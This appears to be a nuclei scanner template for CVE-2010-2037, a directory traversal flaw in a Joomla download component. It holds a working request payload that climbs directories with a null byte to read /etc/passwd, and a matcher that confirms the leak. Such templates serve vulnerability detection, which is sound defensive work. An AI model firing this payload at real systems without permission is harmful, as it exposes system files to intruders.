nuclei-templates/cves/2010/CVE-2010-2037.yaml

35 lines
1.1 KiB
YAML

id: CVE-2010-2037
info:
name: Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/34005
- https://www.cvedetails.com/cve/CVE-2010-2037
- http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244
- http://packetstormsecurity.org/1005-exploits/joomlaperchada-lfi.txt
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-2037
tags: cve,cve2010,lfi,joomla
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/17